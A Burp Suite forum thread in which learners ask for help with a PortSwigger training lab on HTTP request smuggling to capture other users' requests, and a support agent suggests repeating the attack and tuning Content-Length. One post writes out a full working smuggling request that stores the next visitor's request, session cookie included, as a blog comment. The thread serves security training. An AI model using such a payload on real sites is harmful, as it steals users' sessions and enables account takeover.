Research Academy
My account Customers About Blog Careers Legal Contact Resellers

Burp Suite User Forum

Create new post

Exploiting HTTP request smuggling to capture other users' requests

Rajathi | Last updated: Mar 12, 2021 04:34AM UTC

Hi, I am doing the portswigger lab exercises,one of the lab is unable to solve. i follow all the steps as given in the solution. i can reach all the steps but the lab is not solved.If anybody aware of this lab, please advise on this. The lab link is given below. https://portswigger.net/web-security/request-smuggling/exploiting/lab-capture-other-users-requests Thanks

Rajathi | Last updated: Mar 12, 2021 11:37AM UTC

Hi, can i have any solution for the above mentioned lab. Thanks

Michelle, PortSwigger Agent | Last updated: Mar 12, 2021 11:58AM UTC

Thanks for your message. You might find this video from one of our other users helpful, it goes through the various steps to complete the lab: https://www.youtube.com/watch?v=v0jWcPEjNXI Have another try and see how you get on. Good luck :-)

Rajathi | Last updated: Mar 12, 2021 03:32PM UTC

Hai Michelle, Thanks for the reply. I watch the video already, it shows the different cookie session in that lab. https://portswigger.net/web-security/request-smuggling/exploiting/lab-capture-other-users-requests in this lab it shows the same cookie in all the proxy url. Looking forward your solution. Thank you so much.

Rajathi | Last updated: Mar 13, 2021 11:15AM UTC

Hi, Any solution for this issue. Thanks.

Michelle, PortSwigger Agent | Last updated: Mar 15, 2021 10:27AM UTC

Hi Do you see the comments on the blog post showing another user's request?

Michael | Last updated: Aug 05, 2021 05:53AM UTC

I'm experiencing the same issue. Always getting the same cookie as the one used on smuggled request on stored requests. When I try to use it in login post, always responds as NOT SOLVED.

Michelle, PortSwigger Agent | Last updated: Aug 05, 2021 07:35AM UTC

Thanks for your message. Can you tell us a bit more about the steps you have taken to get to this point, please? Do you see a blog post with a comment including a user's request? If you follow along with the community video solution, does that help? This is a lab where you might need to repeat the attack a few times before it's successful as the target user only browses the website intermittently, if you repeat the test a few more times, do you see anything different?

Bryan | Last updated: Sep 13, 2021 06:41AM UTC

I am also having the same issue. The cookie returned is the same as the one submitted in the smuggled request. I've tried doing multiple times already, in a span of 3 days. Content-Length is capped at 808, with the end of the cookie returned in the comments section as "Connection: close". Is this a glitch on the lab itself? Or is there a workaround for it?

Michelle, PortSwigger Agent | Last updated: Sep 13, 2021 01:50PM UTC

Thanks for your message. The victim doesn't visit the page constantly so you might need to send the request a few times before you get a result other than seeing your own cookie. We have tested the lab and we can see blog posts that show the victim's cookie but we did have to send the requests a few times. I'd also maybe suggest using a slightly shorter content-length, maybe start at around 700 and slowly increase from there. Good luck, don't give up, you will crack it :-)

Priyanka | Last updated: Dec 31, 2021 07:13AM UTC

Hi @Michelle, This is my request: POST / HTTP/1.1 Host: acc91f4d1faf6485c0b70322000b009b.web-security-academy.net Cookie: session=bWpx0z3BW0qJhvBVGo9kof3BBkwpv3qU Content-Type: application/x-www-form-urlencoded Content-Length: 211 Transfer-encoding: chunked 0 POST /post/comment HTTP/1.1 Content-Length: 600 Content-Type: application/x-www-form-urlencoded csrf=0acHrE7Vw4H9S4DGK3JRjnOWFUM72zfo&postId=9&name=test+4&email=test%40check.com&website=&comment=check3 and the blogpost comment is this: check3GET /post?postId=9 HTTP/1.1 Host: acc91f4d1faf6485c0b70322000b009b.web-security-academy.net Cookie: session=bWpx0z3BW0qJhvBVGo9kof3BBkwpv3qU Cache-Control: max-age=0 Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="96" Sec-Ch-Ua-Mobile: ?0 Sec-Ch-Ua-Platform: "macOS" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Accept: text/html,application/xhtml xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: https://acc91f4d1faf6485c0b70322000b009b.web-security-academy.net/post/comment/confirmation?postId=9 Accept-Encoding: gzip, deflate Accept-Language: en-GB,e As you see here, the session cookie in the blogpost is my own cookie. I am not getting the victim's cookie.

Michelle, PortSwigger Agent | Last updated: Jan 04, 2022 11:25AM UTC

Every few POST requests that you make to the lab, the victim user will make their own request. You might need to repeat your attack a few times to ensure that the victim user's request occurs as required. This lab is currently passing our tests so can you try it again and let us know if you are still encountering issues?

Shaden | Last updated: Mar 08, 2022 11:21AM UTC

Hi I'm getting a different issue after taking the victim cookie in the blog. I tried to log in with the cookie, but it's not working, and I got this message every time: "Invalid CSRF token (session does not contain a CSRF token)."

Michelle, PortSwigger Agent | Last updated: Mar 08, 2022 02:37PM UTC

Thanks for getting in touch. Can you send some screenshots to support@portswigger.net showing the steps you're taking when you see this message, please?

Dawid | Last updated: Dec 19, 2022 04:21PM UTC

Same issue here. I'm only seeing my own cookie.

Michelle, PortSwigger Agent | Last updated: Dec 19, 2022 04:35PM UTC

Hi What content length are you using in the request you're sending from Repeater? If you alter this and then increase it slowly, does this help?

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.